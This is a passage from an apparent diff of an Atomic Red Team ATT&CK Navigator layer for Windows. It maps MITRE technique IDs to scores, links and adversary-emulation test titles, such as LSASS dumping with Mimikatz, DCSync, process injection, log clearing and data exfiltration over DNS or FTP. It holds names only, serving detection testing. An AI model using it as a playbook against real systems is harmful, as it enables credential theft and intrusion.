Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n- Create Volume Shadow Copy with diskshadow\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View 